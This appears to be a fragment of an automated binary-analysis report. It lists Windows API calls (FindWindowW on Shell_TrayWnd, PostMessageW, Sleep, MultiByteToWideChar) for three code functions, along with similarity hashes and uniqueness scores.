APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00202CCB
• PostMessageW.USER32(00000000), ref: 00202CD2
  • Part of subcall function 001DF1A7: Sleep.KERNEL32 ref: 001DF21F
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 421c32ce2d6b6192714f7b7d2a9395083fe41a0646209cba06aa49fb619731fc
• Instruction ID: dead3ff022245ff6ec466a9e4e1d110b5847ba97fc576573a490e8977df729b5
• Instruction Fuzzy Hash: 1FD0C9753C63506AF668B7B0FC4FFC6AA58AB55B14F4009167646AA1D1CAA0A802C698
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00202C8B
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00202C9E
  • Part of subcall function 001DF1A7: Sleep.KERNEL32 ref: 001DF21F
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 7c405550ee20625e62221045de143967794bf4dbfb934601931135d8913473a0
• Instruction ID: 562d63ce7a215f8f152c374470579b6816cfd7ef2313886da4a52e13c4306dd5
• Instruction Fuzzy Hash: 94D0C9753D5350A6F668B7B0FC4FFD6AA58AB50B14F400916764AAA1D1CAA0A802C694
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 001AC233
• GetLastError.KERNEL32 ref: 001AC241
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001AC29C
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 9471b0f442f56135446d5ebc43cc5cfc8eea597cec44dd5ffccdc16cfdf7399a
• Instruction ID: e870f34cf07fb182146e0e46de4f6e1865a6d1b90bf43f71ca65f00fc6c30d33
• Instruction Fuzzy Hash: 2041C939600206EFCF258FE9D844BBA7BA5EF57720F25416AF859AB1A1DB308D01C7D0
Uniqueness
• Uniqueness Score: -1.00%